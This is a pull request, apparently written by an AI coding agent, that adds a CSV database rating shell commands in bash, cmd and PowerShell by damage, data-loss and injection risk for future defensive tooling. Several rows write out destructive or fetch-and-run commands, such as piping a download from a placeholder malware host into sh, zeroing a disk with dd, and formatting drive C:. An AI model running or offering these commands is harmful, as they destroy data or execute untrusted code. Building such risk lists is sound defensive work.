### PR TITLE
Expand threat DB with argumentless commands

### DIFF
--- a/toolbox-data/README.md
+++ b/toolbox-data/README.md
@@ -1,0 +1,12 @@
+# Toolbox Threat Database Skeleton
+
+This directory provides a compact sample dataset listing command-line options and their associated threat categories. The file `threat_db.csv` is optimized for ingestion by future tooling such as a hypothetical `toolbox.rs` module.
+
+The CSV has the following columns in order:
+
+```
+shell,command,argument,system_damage,data_loss,privilege_escalation,denial_of_service,code_injection
+```
+
+Each row lists a shell (bash, cmd, or PowerShell), a command, one argument string, and five risk dimensions. The risk columns contain float values from `0.0` (no risk) to `1.0` (maximum risk) expressing the relative intensity of each threat. This dataset is intentionally small and ready for future expansion.
+The dataset now includes multiple entries for the same command to capture risk with and without specific options. Argumentless variants are rated so future tooling can calculate baseline threat levels. Use this as a starting point for expansion.

--- a/toolbox-data/threat_db.csv
+++ b/toolbox-data/threat_db.csv
@@ -1,0 +1,31 @@
+shell,command,argument,system_damage,data_loss,privilege_escalation,denial_of_service,code_injection
+bash,rm,-rf,0.9,1.0,0.7,0.4,0.0
+bash,dd,"if=/dev/zero of=/dev/sda",1.0,1.0,0.8,0.6,0.0
+bash,curl,"-s https://malware.com | sh",0.6,0.7,0.8,0.3,1.0
+bash,sudo,"-n true",0.7,0.2,1.0,0.2,0.0
+cmd,del,"/f /q",0.8,0.9,0.5,0.3,0.0
+cmd,reg.exe,"delete HKLM\\... /f",0.9,0.8,0.6,0.4,0.0
+powershell,Remove-Item,"-Recurse -Force",0.8,0.9,0.4,0.2,0.0
+powershell,Invoke-WebRequest,"-UseBasicParsing -Uri http://malicious -OutFile script.ps1; powershell -File script.ps1",0.7,0.5,0.9,0.5,1.0
+bash,rm,,0.6,0.7,0.4,0.2,0.0
+bash,rm,-r,0.8,0.9,0.6,0.3,0.0
+bash,rm,-f,0.7,0.8,0.5,0.3,0.0
+bash,curl,,0.2,0.2,0.3,0.1,0.4
+bash,curl,-s,0.3,0.3,0.4,0.1,0.5
+bash,sh,,0.5,0.5,0.4,0.2,0.9
+bash,dd,,0.8,0.8,0.4,0.5,0.0
+bash,apt-get,"install pkg",0.7,0.6,0.5,0.5,0.2
+bash,apt-get,update,0.2,0.2,0.1,0.1,0.0
+cmd,del,,0.6,0.7,0.4,0.2,0.0
+cmd,del,/f,0.7,0.8,0.4,0.2,0.0
+cmd,del,/s,0.8,0.9,0.4,0.3,0.0
+cmd,reg.exe,"add HKLM\\...",0.6,0.5,0.7,0.3,0.0
+cmd,format,c:,1.0,1.0,0.8,0.8,0.0
+cmd,shutdown,"/s /t 0",0.5,0.2,0.3,0.9,0.0
+powershell,Remove-Item,,0.6,0.7,0.3,0.2,0.0
+powershell,Remove-Item,-Recurse,0.7,0.8,0.3,0.2,0.0
+powershell,Invoke-WebRequest,,0.3,0.4,0.6,0.2,0.5
+powershell,Invoke-WebRequest,-UseBasicParsing,0.4,0.5,0.7,0.3,0.6
+powershell,Start-Process,,0.2,0.2,0.4,0.1,0.2
+powershell,Start-Process,"-FilePath notepad.exe",0.1,0.1,0.3,0.1,0.2
+powershell,Set-ExecutionPolicy,Unrestricted,0.1,0.2,0.8,0.4,0.1


### PR DESCRIPTION
## Summary
- expand `threat_db.csv` with additional Linux and Windows commands
- include argumentless variants to capture baseline risk levels
- clarify README about the new multi-entry structure

## Testing
- `pnpm test` *(fails: vitest not found)*
- `pnpm run lint` *(fails: ESLint config missing)*
- `pnpm run typecheck` *(fails: missing types)*

------
https://chatgpt.com/codex/tasks/task_e_6850b34a3a34832a94bf3ef9e47e33da